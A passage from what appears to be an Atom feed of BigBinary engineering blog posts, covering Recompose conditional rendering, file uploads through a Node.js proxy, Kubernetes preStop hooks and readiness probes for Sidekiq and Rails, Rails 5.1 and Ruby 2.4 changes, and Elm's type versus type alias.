import PayOnlineScreen from &quot;components/PaymentsModal/PayOnlineScreen&quot;;
import CashOnDeliveryScreen from &quot;components/PaymentsModal/CashScreen&quot;;
import SwipeOnDeliveryScreen from &quot;components/PaymentsModal/CardScreen&quot;;

const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;
const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;
const online = &quot;ONLINE&quot;;

const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;

const conditionalRender = states =&gt;
  compose(
    ...states.map(state =&gt; branch(state.when, renderComponent(state.then)))
  );

const enhance = compose(
  conditionalRender([
    { when: isCashOnDelivery, then: CashOnDeliveryScreen },
    { when: isSwipeOnDelivery, then: SwipeOnDeliveryScreen },
  ])
);

const PayOnline = enhance(PayOnlineScreen);

@connect(() =&gt; ({}), { ...authActions })
export default class PaymentsModal extends Component {
  static propTypes = {
    isModalVisible: PropTypes.bool.isRequired,
    hidePaymentModal: PropTypes.func.isRequired,
    orderDetails: PropTypes.object.isRequired,
  };

  state = {
    paymentType: online,
  };

  render() {
    const { isModalVisible, hidePaymentModal, orderDetails } = this.props;
    return (
      &lt;Modal
        show={isModalVisible}
        onHide={hidePaymentModal}
        dialogClassName=&quot;modal-payments&quot;
      &gt;
        &lt;PaymentsModalBase
          orderDetails={orderDetails}
          hidePaymentModal={hidePaymentModal}
        &gt;
          &lt;PayOnline {...this.state} /&gt;
        &lt;/PaymentsModalBase&gt;
      &lt;/Modal&gt;
    );
  }
}</code></pre><h3>Functional code is a win</h3><p>Functional code is all about composing smaller functions together like lego pieces.
It results in better code because functions are usually smaller in size and do only one thing.</p><p>In the coming weeks we will see more applications of Recompose in the real world.</p>]]></content>
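The branch/compose pattern above doesn't depend on React itself. A minimal sketch in plain JavaScript — with toy stand-ins for `branch`, `renderComponent`, and `compose`, not the real Recompose implementations — shows how the conditions chain when a "component" is just a function from props to a string:

```javascript
// Toy stand-ins for Recompose's helpers, to illustrate the chaining.
const compose = (...hocs) => component =>
  hocs.reduceRight((acc, hoc) => hoc(acc), component);

// If the predicate matches, render the left HOC; otherwise keep the wrapped component.
const branch = (predicate, leftHoc) => wrapped => {
  const left = leftHoc(wrapped);
  return props => (predicate(props) ? left(props) : wrapped(props));
};

// An HOC that ignores the wrapped component and always renders `component`.
const renderComponent = component => () => component;

// "Screens" are plain functions here.
const PayOnlineScreen = () => "pay-online";
const CashScreen = () => "cash-on-delivery";

const isCashOnDelivery = ({ paymentType }) => paymentType === "CASH_ON_DELIVERY";

const MainScreen = compose(
  branch(isCashOnDelivery, renderComponent(CashScreen))
)(PayOnlineScreen);

console.log(MainScreen({ paymentType: "CASH_ON_DELIVERY" })); // → "cash-on-delivery"
console.log(MainScreen({ paymentType: "ONLINE" })); // → "pay-online"
```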
    </entry><entry>
       <title><![CDATA[Uploading file in an isomorphic ReactJS app]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/uploading-file-in-an-isomorphic-reactjs-app"/>
      <updated>2017-08-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/uploading-file-in-an-isomorphic-reactjs-app</id>
      <content type="html"><![CDATA[<h3>Design of an isomorphic App</h3><p>In a typical <strong>single-page application (SPA)</strong> server sends JSON data. Browserreceives that JSON data and builds HTML.</p><p>In an isomorphic app, the server sends a fully-formed HTML to the browser. Thisis typically done for SEO, performance and code maintainability.</p><p>In an isomorphic app the browser does not directly deal with the API server.This is because the API server will render JSON data and browser needs to havefully formed HTML. To solve this problem a &quot;proxy server&quot; is introduced inbetween the browser and the API server.</p><p><img src="/blog_images/2017/uploading-file-in-an-isomorphic-reactjs-app/isomorphic_architecture.jpg" alt="Architecture"></p><p>In this case the proxy server is powered by Node.js.</p><h3>Uploading a file in an isomorphic app</h3><p>Recently, while working on an isomorphic app, we needed to upload a file to theAPI server. We couldn't directly upload from the browser because we ran into<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS">CORS</a>issue.</p><p>One way to solve CORS issue is to add CORS support to the API sever. Since wedid not have access to the API server this was not an option. 
It means the file must now go through the proxy server.</p><p>The problem can be seen as two separate issues.</p><ol><li>Uploading the file from the browser to the proxy server.</li><li>Uploading the file from the proxy server to the API server.</li></ol><h3>Implementation</h3><p>Before we start writing any code, we need to accept the file on the proxy server, which can be done by using <a href="https://github.com/expressjs/multer">Multer</a>.</p><p><strong>Multer</strong> is a node.js middleware for handling <code>multipart/form-data</code>.</p><p>We need to initialize <strong>multer</strong> with a path where it will store the uploaded files.</p><p>We can do that by adding the following code before initializing the node.js server app.</p><pre><code class="language-javascript">app
  .set(&quot;config&quot;, config)
  // ...other middleware
  .use(multer({ dest: &quot;uploads/&quot; }).any()); // add this line</code></pre><p>Now any file uploaded to the proxy server will be stored in the <code>uploads/</code> directory.</p><p>Next we need a function which uploads a file from the browser to the node.js server.</p><pre><code class="language-javascript">// code on client
function uploadImagesToNodeServer(files) {
  const formData = new FormData();
  map(files, (file, fileName) =&gt; {
    if (file &amp;&amp; file instanceof File) {
      formData.append(fileName, file);
    }
  });

  superagent
    .post(&quot;/node_server/upload_path&quot;)
    .type(&quot;form&quot;)
    .set(headers)
    .send(formData)
    .then(response =&gt; {
      // handle response
    });
}</code></pre><p>Next, let's upload the same file from the node.js server to the API server.</p><p>To do that, we need to add a callback function to our node.js server where we are accepting the POST request from step 1.</p><pre><code class="language-javascript">// code on node.js server
app.post(&quot;/node_server/upload_path&quot;, function (req, res) {
  uploadImagesToApiServer(req);
  // handle response
});

function uploadImagesToApiServer(req) {
  superagent
    .post(&quot;/api_server/upload_path&quot;)
    .type(&quot;form&quot;)
    .set(headers)
    .attach(&quot;image&quot;, req.files[0].path)
    .then(response =&gt; {
      // handle response
    });
}</code></pre>]]></content>
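Under the hood, what Multer parses and superagent sends is just a <code>multipart/form-data</code> body. A dependency-free sketch of that wire format (simplified to text fields only; real file parts add Content-Type headers and binary payloads):

```javascript
// Build a minimal multipart/form-data body by hand (text fields only),
// just to show the wire format the proxy server parses.
function buildMultipartBody(fields, boundary) {
  const parts = Object.entries(fields).map(
    ([name, value]) =>
      `--${boundary}\r\n` +
      `Content-Disposition: form-data; name="${name}"\r\n\r\n` +
      `${value}\r\n`
  );
  // The closing boundary has two extra dashes at the end.
  return parts.join("") + `--${boundary}--\r\n`;
}

const body = buildMultipartBody({ title: "avatar" }, "XBOUNDARY");
console.log(body);
```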
    </entry><entry>
       <title><![CDATA[Graceful shutdown of Sidekiq processes on Kubernetes]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/graceful-shutdown-of-sidekiq-processes-on-k8s"/>
      <updated>2017-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/graceful-shutdown-of-sidekiq-processes-on-k8s</id>
      <content type="html"><![CDATA[<p>In our last <a href="deploying-rails-applications-using-kubernetes-with-zero-downtime">blog</a>, we explained how to handlerolling deployments of Rails applications with no downtime.</p><p>In this article we will walk you throughhow to handle graceful shutdown of processes in Kubernetes.</p><p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a>terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>and<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>When we deploy Rails applications on kubernetesit stops existing pods and spins up new ones.When old pod is terminated by Replicaset,then active Sidekiq processes are also terminated.We run our batch jobs using sidekiq and it is possible thatsidekiq jobs might be running when deployment is being performed.Terminating old pod during deployment can kill the already running jobs.</p><h3>Solution #1</h3><p>As per default<a href="https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods">pod termination</a>policy of kubernetes, kubernetes sends command to delete pod with a default grace period of 30 seconds.At this time kubernetes sends TERM signal.When the grace period expires, any processes still running in the Pod are killed with SIGKILL.</p><p>We can adjust the <code>terminationGracePeriodSeconds</code> timeout as per our need and can change it from30 seconds to 2 minutes.</p><p>However there might be cases where we are notsure how much time a process takes to gracefully shutdown.In such cases we should consider using<code>PreStop</code> hook which is our next solution.</p><h3>Solution #2</h3><p>Kubernetes provides many<a href="https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/">Container lifecycle hooks</a>.</p><p><code>PreStop</code> hook is called immediately before a container is terminated.It is a blocking call. 
It means it is synchronous. It also means that this hook must complete before the container is terminated.</p><p>Note that unlike solution #1, this solution is not time bound. Kubernetes will wait as long as it takes for the <code>PreStop</code> process to finish. It is never a good idea to have a process which takes more than a minute to shut down, but in the real world there are cases where more time is needed. Use <code>PreStop</code> for such cases.</p><p>We decided to use the <code>preStop</code> hook to stop Sidekiq because we had some really long running processes.</p><h3>Using PreStop hooks in Sidekiq deployment</h3><p>This is a simple deployment template which terminates the <a href="https://github.com/mperham/sidekiq/wiki/Signals">Sidekiq process</a> when the pod is terminated during deployment.</p><pre><code class="language-yaml">apiVersion: v1
kind: Deployment
metadata:
  name: test-staging-sidekiq
  labels:
    app: test-staging
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
          name: test-staging
          imagePullPolicy: Always
          env:
            - name: REDIS_HOST
              value: test-staging-redis
            - name: APP_ENV
              value: staging
            - name: CLIENT
              value: test
          volumeMounts:
            - mountPath: /etc/sidekiq/config
              name: test-staging-sidekiq
          ports:
            - containerPort: 80
      volumes:
        - name: test-staging-sidekiq
          configMap:
            name: test-staging-sidekiq
            items:
              - key: config
                path: sidekiq.yml
      imagePullSecrets:
        - name: registrykey</code></pre><p>Next we will use the <code>PreStop</code> lifecycle hook to stop Sidekiq safely before pod termination.</p><p>We will add the following block in the deployment manifest.</p><pre><code class="language-yaml">lifecycle:
  preStop:
    exec:
      command:
        [
          &quot;/bin/bash&quot;,
          &quot;-l&quot;,
          &quot;-c&quot;,
          &quot;cd /opt/myapp/current; for f in tmp/pids/sidekiq*.pid; do bundle exec sidekiqctl stop $f; done&quot;,
        ]</code></pre><p>The <code>PreStop</code> hook stops all the Sidekiq processes and does a graceful shutdown of Sidekiq before terminating the pod.</p><p>We can add this configuration to the original deployment manifest.</p><pre><code class="language-yaml">apiVersion: v1
kind: Deployment
metadata:
  name: test-staging-sidekiq
  labels:
    app: test-staging
  namespace: test
spec:
  replicas: 1
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
          name: test-staging
          imagePullPolicy: Always
          lifecycle:
            preStop:
              exec:
                command:
                  [
                    &quot;/bin/bash&quot;,
                    &quot;-l&quot;,
                    &quot;-c&quot;,
                    &quot;cd /opt/myapp/current; for f in tmp/pids/sidekiq*.pid; do bundle exec sidekiqctl stop $f; done&quot;,
                  ]
          env:
            - name: REDIS_HOST
              value: test-staging-redis
            - name: APP_ENV
              value: staging
            - name: CLIENT
              value: test
          volumeMounts:
            - mountPath: /etc/sidekiq/config
              name: test-staging-sidekiq
          ports:
            - containerPort: 80
      volumes:
        - name: test-staging-sidekiq
          configMap:
            name: test-staging-sidekiq
            items:
              - key: config
                path: sidekiq.yml
      imagePullSecrets:
        - name: registrykey</code></pre><p>Let's launch this deployment and monitor the rolling deployment.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.yml
deployment &quot;test-staging-sidekiq&quot; configured</code></pre><p>We can confirm that existing Sidekiq
jobs are completed before the termination of the old pod during the deployment process. In this way we handle a graceful shutdown of the Sidekiq process. We can apply this technique to other processes as well.</p>]]></content>
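The idea behind the shutdown — finish the job already picked up instead of dying mid-job when TERM arrives — can be sketched in plain Ruby with a signal trap. This is a toy illustration, not Sidekiq's actual implementation (Sidekiq handles TERM internally):

```ruby
# Toy "worker loop": on TERM, stop picking up new jobs but
# let the current one finish -- the essence of a graceful shutdown.
shutting_down = false
Signal.trap("TERM") { shutting_down = true }

completed = []
%w[job1 job2 job3].each do |job|
  break if shutting_down   # no new jobs once shutdown has begun
  completed << job         # "process" the job
  if job == "job2"
    Process.kill("TERM", Process.pid) # simulate the preStop hook firing
    sleep 0.1                         # give the signal handler a chance to run
  end
end

puts completed.inspect
```

job3 is never started, but job2 — in flight when TERM arrived — completes.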
    </entry><entry>
       <title><![CDATA[New Syntax for HTML Tag helpers in Rails 5.1]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/new-syntax-for-tag-helpers-in-rails-5-1"/>
      <updated>2017-08-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-syntax-for-tag-helpers-in-rails-5-1</id>
      <content type="html"><![CDATA[<p>Rails is great at generating HTML using helpers such as<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TagHelper.html#method-i-content_tag">content_tag</a>and<a href="http://api.rubyonrails.org/classes/ActionView/Helpers/TagHelper.html#method-i-tag">tag</a>.</p><pre><code class="language-erb">content_tag(:div, , class: &quot;home&quot;)&lt;div class=&quot;home&quot;&gt;&lt;/div&gt;</code></pre><p>Rails 5.1 has <a href="https://github.com/rails/rails/issues/25195">introduced</a><a href="https://github.com/rails/rails/pull/25543">new syntax</a> for this in the form ofenhanced <code>tag</code> helper.</p><p>Now that same HTML div tag can be generated as follows.</p><pre><code class="language-erb">tag.div class: 'home'&lt;div class=&quot;home&quot;&gt;&lt;/div&gt;</code></pre><p>Earlier, the tag type was decided by the positional argument to the<code>content_tag</code> and <code>tag</code> methods but now we can just call the required tag typeon the <code>tag</code> method itself.</p><p>We can pass the tag body and attributes in the block format as well.</p><pre><code class="language-erb">&lt;%= tag.div class: 'home' do %&gt;  Welcome to Home!&lt;% end %&gt;&lt;div class=&quot;home&quot;&gt;  Welcome to Home!&lt;/div&gt;</code></pre><h3>HTML5 compliant by default</h3><p>The new <code>tag</code> helper is also HTML 5 compliant by default, such that it respectsHTML5 features such as<a href="https://www.w3.org/TR/html5/syntax.html#void-elements">void elements</a>.</p><h3>Backward compatibility</h3><p>The old syntax of <code>content_tag</code> and <code>tag</code> methods is still supported but mightbe deprecated and removed in future versions of Rails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Avoid exception for dup on Integer]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/avoid-exceptions-for-dup-on-interger-and-similar-cases"/>
      <updated>2017-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/avoid-exceptions-for-dup-on-interger-and-similar-cases</id>
      <content type="html"><![CDATA[<p>Prior to Ruby 2.4, if we were to <code>dup</code> an <code>Integer</code>, it would fail with a<code>TypeError</code>.</p><pre><code class="language-ruby">&gt; 1.dupTypeError: can't dup Fixnumfrom (irb):1:in `dup'from (irb):1</code></pre><p>This was confusing because <code>Integer#dup</code> is actually implemented.</p><pre><code class="language-ruby">&gt; Integer.respond_to? :dup=&gt; true</code></pre><p>However, if we were to freeze an <code>Integer</code> it would fail silently.</p><pre><code class="language-ruby">&gt; 1.freeze=&gt; 1</code></pre><p>Ruby 2.4 has now included dup-ability for <code>Integer</code> as well.</p><pre><code class="language-ruby">&gt; 1.dup=&gt; 1</code></pre><p>In Ruby, some object types are immediate variables and therefore cannot beduped/cloned. Yet, there was no graceful way of averting the error thrown by thesanity check when we attempt to dup/clone them.</p><p>So now <code>Integer#dup</code> functions exactly the way <code>freeze</code> does -- fail silentlyand return the object itself. It makes sense because nothing about these objectscan be changed in the first place.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deploy Rails apps on Kubernetes cluster & no downtime]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime"/>
      <updated>2017-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime</id>
      <content type="html"><![CDATA[<p>This post assumes that you have a basic understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a> and <a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>We deploy Rails applications on Kubernetes frequently, and we need to ensure that deployments do not cause any downtime. When we used Capistrano to manage deployments it was much easier, since it has a provision to restart services in a rolling fashion.</p><p>Kubernetes restarts pods directly, and any process already running on the pod is terminated. So on rolling deployments we face downtime until the new pod is up and running.</p><h3>Solution</h3><p>In Kubernetes we have <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-probes/">readiness probes and liveness probes</a>. Liveness probes take care of keeping a pod alive, while readiness probes are responsible for keeping pods ready.</p><p>This is what the Kubernetes documentation has to say about when to use readiness probes.</p><blockquote><p>Sometimes, applications are temporarily unable to serve traffic. For example, an application might need to load large data or configuration files during startup. In such cases, you don't want to kill the application, but you don't want to send it requests either. Kubernetes provides readiness probes to detect and mitigate these situations. 
A pod with containers reporting that they are not ready does not receive traffic through Kubernetes Services.</p></blockquote><p>It means new traffic should not be routed to pods which are currently running but are not ready yet.</p><h3>Using readiness probes in deployment flow</h3><p>Here is what we are going to do.</p><ul><li>We will use readiness probes to deploy our Rails app.</li><li>The readiness probe definition has to be specified in the pod <code>spec</code> of the deployment.</li><li>The readiness probe uses a health check to detect the pod's readiness.</li><li>We will create a simple file on our pod with the name <code>health_check</code> returning status <code>200</code>.</li><li>This health check runs on an arbitrary port, 81.</li><li>We will expose this port in the nginx config running on the pod.</li><li>When our application is up on nginx, this health check returns <code>200</code>.</li><li>We will use the above fields to configure the health check in the pod's spec of the deployment.</li></ul><p>Now let's build a test deployment manifest.</p><pre><code class="language-yaml">---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-staging
  labels:
    app: test-staging
  namespace: test
spec:
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-staging
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-staging-postgres
        - name: APP_ENV
          value: staging
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
      imagePullSecrets:
        - name: registrykey</code></pre><p>This is a simple deployment template which will terminate pods during a rolling deployment. The application may suffer downtime until the new pod is in the running state.</p><p>Next we will use a readiness probe to define when a pod is ready to accept application traffic. We will add the following block to the deployment manifest.</p><pre><code 
class="language-yaml">readinessProbe:
  httpGet:
    path: /health_check
    port: 81
  periodSeconds: 5
  successThreshold: 3
  failureThreshold: 2</code></pre><p>In the above readiness probe definition, <code>httpGet</code> performs the health check over HTTP.</p><p>The health check requests the file <code>health_check</code>, which returns <code>200</code> when accessed over port <code>81</code>. We poll it every 5 seconds, as specified by the <code>periodSeconds</code> field.</p><p>We will mark the pod as ready only after the health check succeeds 3 times, as per <code>successThreshold</code>. Similarly, we will mark it as failed after the health check fails twice, as per <code>failureThreshold</code>. These values can be adjusted as per the application's needs. This helps the deployment determine whether the pod is in ready status or not. Along with readiness probes, for rolling updates we will use <code>maxUnavailable</code> and <code>maxSurge</code> in the deployment strategy.</p><p>As per the Kubernetes documentation:</p><blockquote><p><strong><code>maxUnavailable</code></strong> is a field that specifies the maximum number of Pods that can be unavailable during the update process. The value can be an absolute number (e.g. 5) or a percentage of desired Pods (e.g. 10%). The absolute number is calculated from percentage by rounding down. This can not be 0.</p></blockquote><p>and</p><blockquote><p><strong><code>maxSurge</code></strong> is a field that specifies the maximum number of Pods that can be created above the desired number of Pods. The value can be an absolute number (e.g. 5) or a percentage of desired Pods (e.g. 
10%). This cannot be 0 if MaxUnavailable is 0. The absolute number is calculated from percentage by rounding up. By default, a value of 25% is used.</p></blockquote><p>Now we will update our deployment manifest with two replicas and the rolling update strategy by specifying the following parameters.</p><pre><code class="language-yaml">replicas: 2
minReadySeconds: 50
revisionHistoryLimit: 10
strategy:
  type: RollingUpdate
  rollingUpdate:
    maxUnavailable: 50%
    maxSurge: 1</code></pre><p>This makes sure that during a deployment one of our pods is always running, and at most 1 extra pod can be created.</p><p>We can read more about rolling deployments <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment">here</a>.</p><p>We can add this configuration to the original deployment manifest.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: test-staging
  labels:
    app: test-staging
  namespace: test
spec:
  replicas: 2
  minReadySeconds: 50
  revisionHistoryLimit: 10
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 50%
      maxSurge: 1
  template:
    metadata:
      labels:
        app: test-staging
    spec:
      containers:
      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest
        name: test-staging
        imagePullPolicy: Always
        env:
        - name: POSTGRES_HOST
          value: test-staging-postgres
        - name: APP_ENV
          value: staging
        - name: CLIENT
          value: test
        ports:
        - containerPort: 80
        readinessProbe:
          httpGet:
            path: /health_check
            port: 81
          periodSeconds: 5
          successThreshold: 3
          failureThreshold: 2
      imagePullSecrets:
        - name: registrykey</code></pre><p>Let's launch this deployment using the command given below and monitor the rolling deployment.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.yml
deployment &quot;test-staging-web&quot; 
configured</code></pre><p>After the deployment is applied, we can check the pods and observe how they are restarted.</p><p>We can also access the application to check whether we face any downtime.</p><pre><code class="language-bash">$ kubectl get pods
NAME                               READY     STATUS    RESTARTS   AGE
test-staging-web-372228001-t85d4   1/1       Running   0          1d
test-staging-web-372424609-1fpqg   0/1       Running   0          50s</code></pre><p>We can see above that only one pod is re-created at a time, and one of the old pods keeps serving the application traffic. Also, the new pod is running but not ready, as it has not yet passed the readiness probe condition.</p><p>After some time, when the new pod is in the ready state, the old pod is terminated and traffic is served by the new pod. In this way, our application does not suffer any downtime and we can confidently do deployments even at peak hours.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 enhances ActiveSupport::TimeZone.country_zones]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-returns-unmapped-timezones-from-activesupport-timezone-country_zones"/>
      <updated>2017-07-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-returns-unmapped-timezones-from-activesupport-timezone-country_zones</id>
      <content type="html"><![CDATA[<p>The <a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html">ActiveSupport::TimeZone</a> class serves as a wrapper around the <a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html">TZInfo::TimeZone</a> class. It limits the set of zones provided by TZInfo to a smaller, more meaningful subset and returns zones with friendly names. For example, the TZInfo gem returns &quot;America/New_York&quot; whereas Active Support returns &quot;Eastern Time (US &amp; Canada)&quot;.</p><p>The <a href="http://api.rubyonrails.org/classes/ActiveSupport/TimeZone.html#method-c-country_zones">ActiveSupport::TimeZone.country_zones</a> method returns a set of TimeZone objects for the timezones in a country, specified as a 2-character country code.</p><pre><code class="language-ruby"># Rails 5.0
&gt;&gt; ActiveSupport::TimeZone.country_zones('US')
=&gt; [#&lt;ActiveSupport::TimeZone:0x007fcc2b9b3198 @name=&quot;Hawaii&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: Pacific/Honolulu&gt;&gt;, #&lt;ActiveSupport::TimeZone:0x007fcc2b9d9ac8 @name=&quot;Alaska&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/Juneau&gt;&gt;, #&lt;ActiveSupport::TimeZone:0x007fcc2ba03a08 @name=&quot;Pacific Time (US &amp; Canada)&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/Los_Angeles&gt;&gt;, ...]</code></pre><p>In Rails 5.0, the <code>country_zones</code> method returns an empty array for some countries. This is because <code>ActiveSupport::TimeZone::MAPPING</code> supports only a limited number of timezone names.</p><pre><code class="language-ruby">&gt;&gt; ActiveSupport::TimeZone.country_zones('SV') # El Salvador
=&gt; []</code></pre><p>Rails 5.1 <a href="https://github.com/rails/rails/commit/ec9b4d39108d4c22d00426fa95c61b8b37dfe4e3">fixed</a> this <a href="https://github.com/rails/rails/issues/28431">issue</a>. 
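The fix boils down to a fallback lookup. The sketch below is a simplified illustration, not the actual Rails implementation: the plain hashes `MAPPING` and `TZ_IDENTIFIERS`, and the helper `country_zones_for`, are hypothetical stand-ins for `ActiveSupport::TimeZone::MAPPING` and the TZInfo country index.

```ruby
# Simplified sketch of the Rails 5.1 behavior; NOT the real implementation.
# MAPPING stands in for ActiveSupport::TimeZone::MAPPING (friendly name => tz identifier).
MAPPING = { "Eastern Time (US & Canada)" => "America/New_York" }

# Hypothetical country index: country code => tz identifiers for that country.
TZ_IDENTIFIERS = {
  "US" => ["America/New_York"],
  "SV" => ["America/El_Salvador"]
}

def country_zones_for(country_code)
  TZ_IDENTIFIERS.fetch(country_code, []).map do |id|
    # Use the friendly name when the identifier is present in MAPPING;
    # otherwise (the Rails 5.1 change) fall back to the raw identifier
    # instead of dropping the zone.
    MAPPING.key(id) || id
  end
end
```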
So now, if the country is not found in the <code>MAPPING</code> hash, a new <code>ActiveSupport::TimeZone</code> instance for the country is returned.</p><pre><code class="language-ruby">&gt;&gt; ActiveSupport::TimeZone.country_zones('SV') # El Salvador
=&gt; [#&lt;ActiveSupport::TimeZone:0x007ff0dab83080 @name=&quot;America/El_Salvador&quot;, @utc_offset=nil, @tzinfo=#&lt;TZInfo::DataTimezone: America/El_Salvador&gt;&gt;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Difference between type and type alias in Elm]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/difference-between-type-and-type-alias-in-elm"/>
      <updated>2017-07-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/difference-between-type-and-type-alias-in-elm</id>
      <content type="html"><![CDATA[<p>What is the difference between <code>type</code> and <code>type alias</code>?</p><p>The Elm FAQ has <a href="http://faq.elm-community.org/#what-is-the-difference-between-type-and-type-alias">an answer</a> to this question. However, I could not fully understand the answer.</p><p>This is my attempt at explaining it.</p><h2>What is type</h2><p>In Elm everything has a type. Fire up <code>elm-repl</code> and you will see that 4 is a <code>number</code> and &quot;hello&quot; is a <code>String</code>.</p><pre><code class="language-elm">&gt; 4
4 : number
&gt; &quot;hello&quot;
&quot;hello&quot; : String</code></pre><p>Let's assume that we are working with user records and we have the following attributes for those users.</p><ul><li>Name</li><li>Age</li><li>Status (Active or Inactive)</li></ul><p>It's pretty clear that &quot;Name&quot; should be of type &quot;String&quot; and &quot;Age&quot; should be of type &quot;number&quot;.</p><p>Let's think for a moment about the type of &quot;Status&quot;. What are &quot;Active&quot; and &quot;Inactive&quot; in terms of types?</p><p><code>Active</code> and <code>Inactive</code> are two valid values of <code>Status</code>. In other programming languages we might represent <code>Status</code> as an enum.</p><p>In Elm we need to create a new type. And that can be done as shown here.</p><pre><code class="language-elm">type Status = Active | Inactive</code></pre><p>Here we are creating a new type called <code>Status</code>, and we are stating that the valid values for this new type are <code>Active</code> and <code>Inactive</code>.</p><p>When I discussed this code with my team members they asked me to show where <code>Active</code> and <code>Inactive</code> are defined. Good question.</p><p>The simple answer is that they are not defined anywhere. They do not need to be defined. 
What needs definition is the new type that is being created.</p><p>What makes this a bit hard to understand for people coming from Ruby, Java and similar backgrounds is that such people (including me) look at <code>Active</code> and <code>Inactive</code> as classes or constants, which is not the right way to look at them.</p><p><code>Active</code> and <code>Inactive</code> are the valid values for type <code>Status</code>.</p><pre><code class="language-elm">&gt; Active
-- NAMING ERROR ----------
Cannot find variable `Active`

3|   Active
     ^^^^^^</code></pre><p>As you can see, the repl is not sure what <code>Active</code> is.</p><p>We can solve this by pasting the following code in the repl.</p><pre><code class="language-elm">type Status = Active | Inactive</code></pre><p>Now we can run the same code again. This time there is no error.</p><pre><code class="language-elm">&gt; Active
Active : Repl.Status</code></pre><h2>What is type alias</h2><p>Let's look at a simple application which just prints the name and age of a single user.</p><p><a href="https://gist.github.com/neerajsingh0101/60627801877312ea95e328f704e5245a">Here</a> is the code. I'm posting a screenshot of the same below with a certain part highlighted.</p><p><img src="/blog_images/2017/difference-between-type-and-type-alias-in-elm/code-without-type-alias.png" alt="code without type alias"></p><p>As you can see, <code>{ name : String, age : Int }</code> is repeated at four different places. In a bigger application it might get repeated even more often.</p><p>This is what <code>type alias</code> does. It removes repetition. It removes verbosity.</p><p>As the name suggests, this is just an alias. Note that <code>type</code> creates a new type whereas <code>type alias</code> is literally saving keystrokes. 
<code>type alias</code> does not create a new <code>type</code>.</p><p>Now if you read the FAQ answer again, hopefully it will make more sense.</p><p><a href="https://gist.github.com/neerajsingh0101/8e7756a1b7588538ac16526ce2bfc772">Here</a> is the modified code using <code>type alias</code>.</p><h2>Why use type alias Username : String</h2><p>While browsing Elm code, I came across the following.</p><pre><code class="language-elm">type alias Username = String</code></pre><p>The question is what code like this buys us. All it does is that instead of <code>String</code> I can now type <code>Username</code>.</p><p>First let's see how it might be used.</p><p>Let's assume that we have a function which returns the <code>Status</code> of a user for the given username.</p><p>The function might have an implementation as shown below.</p><pre><code class="language-elm">getUserStatus username =
